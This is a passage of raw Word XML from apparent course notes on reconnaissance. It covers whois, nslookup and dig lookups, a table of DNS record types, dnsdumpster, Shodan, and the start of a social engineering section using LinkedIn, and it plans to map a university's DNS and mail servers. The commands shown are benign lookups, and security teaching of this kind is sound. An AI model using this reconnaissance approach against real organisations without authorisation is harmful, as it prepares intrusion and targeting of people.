          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A WHOIS server is a service that provides some information about a domain name. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7648E1" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD6B9A7" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00155E9B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00155E9B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>whois</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00155E9B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> google.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419D144F" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This should return info about registrar, creation date, Name Server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4220EFF8" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04A2CBB3" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">nslookup: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">this command provides the ip addresses for any domain name. For instance, you only know the domain name about your target, and you want to use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to do more stuff, you could translate the domain name to an ip address using nslookup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746D33E4" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6CB5EE" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00155E9B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nslookup</w:t>
      </w:r>
      <w:r w:rsidRPr="00155E9B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> google.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118C27EE" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">nslookup only offers the main domain, and sometimes you also need to know about the subdomains. Therefore, a service like </w:t>
      </w:r>
      <w:hyperlink r:id="rId107" w:history="1">
        <w:r w:rsidRPr="005D6581">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://dnsdumpster.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> was introduced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E49F57" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05C1AA32" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Let’s find which DNS and email servers are used by Fontys and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fhict</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AAEE9E" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="459114EA" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>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Default="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4508"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="004E2155" w14:paraId="2771C6FF" w14:textId="77777777" w:rsidTr="000C07E7">
        <w:trPr>
          <w:trHeight w:val="837"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40120017" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00484919" w:rsidRDefault="004E2155" w:rsidP="000C07E7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0D9A3FC3" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00484919" w:rsidRDefault="004E2155" w:rsidP="000C07E7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00484919">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Qyery</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00484919">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="718CC14D" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00484919" w:rsidRDefault="004E2155" w:rsidP="000C07E7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3FE0A048" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00484919" w:rsidRDefault="004E2155" w:rsidP="000C07E7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00484919">
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E2155" w14:paraId="7F9ECFB0" w14:textId="77777777" w:rsidTr="000C07E7">
        <w:trPr>
          <w:trHeight w:val="694"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52EBDA22" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00484919" w:rsidRDefault="004E2155" w:rsidP="000C07E7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00484919">
              <w:rPr>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D1C3EB7" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00484919" w:rsidRDefault="004E2155" w:rsidP="000C07E7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00484919">
              <w:rPr>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>IPv4 Addresses</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E2155" w14:paraId="37EA4233" w14:textId="77777777" w:rsidTr="000C07E7">
        <w:trPr>
          <w:trHeight w:val="704"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A9291A5" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00484919" w:rsidRDefault="004E2155" w:rsidP="000C07E7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00484919">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>AAAA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33EA206A" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="000C07E7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00484919">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>IPv6 Addresses</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E2155" w14:paraId="50383A93" w14:textId="77777777" w:rsidTr="000C07E7">
        <w:trPr>
          <w:trHeight w:val="703"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30FA6124" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="000C07E7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00484919">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>CNAME</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="106D67EA" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00484919" w:rsidRDefault="004E2155" w:rsidP="000C07E7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00484919">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Canonical Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E2155" w14:paraId="27B16709" w14:textId="77777777" w:rsidTr="000C07E7">
        <w:trPr>
          <w:trHeight w:val="557"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="182BE695" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00484919" w:rsidRDefault="004E2155" w:rsidP="000C07E7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00484919">
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>MX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6739990D" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="000C07E7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00484919">
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Mail Servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E2155" w14:paraId="4B4F8237" w14:textId="77777777" w:rsidTr="000C07E7">
        <w:trPr>
          <w:trHeight w:val="730"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BCA798B" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="000C07E7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00484919">
              <w:rPr>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SOA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01A5A8F5" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00484919" w:rsidRDefault="004E2155" w:rsidP="000C07E7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00484919">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Start of Authority</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E2155" w14:paraId="35DD26CC" w14:textId="77777777" w:rsidTr="000C07E7">
        <w:trPr>
          <w:trHeight w:val="734"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44434F33" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="000C07E7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00484919">
              <w:rPr>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="654226F3" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00615206" w:rsidRDefault="004E2155" w:rsidP="000C07E7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00615206">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TXT Records</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="002636E1" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55141640" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EA67E26" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54426B6B" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00484919" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="131FCC34" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45E9A2AF" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F12EB77" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03E0108C" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45E775F1" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BA48966" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5237E8A4" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45E4CC92" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7588D394" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D29CD1A" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">dig: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dig is like nslookup command. It returns general information about the input domain. However, it returns more information such as the TTL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AE2D7E" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20142CD1" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00155E9B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dig</w:t>
      </w:r>
      <w:r w:rsidRPr="00155E9B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> google.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410812EF" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DCB3FD3" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="295C7C29" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C140A22" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Shodan.io</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D5A102" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Shodan is a search engine that provides information about all the reachable devices. You can get information about a network only by searching their domain name. Also, you can search for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ports</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and it tries to connect you to that port. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298E775C" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5985CFA6" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D7BFB3A" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1861DDCE" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Social Engineering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D86D384" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>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Default="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">I will use </w:t>
      </w:r>
      <w:hyperlink r:id="rId109" w:history="1">
        <w:r w:rsidRPr="001017FD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.linkedin.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B5CA35" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00347098" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
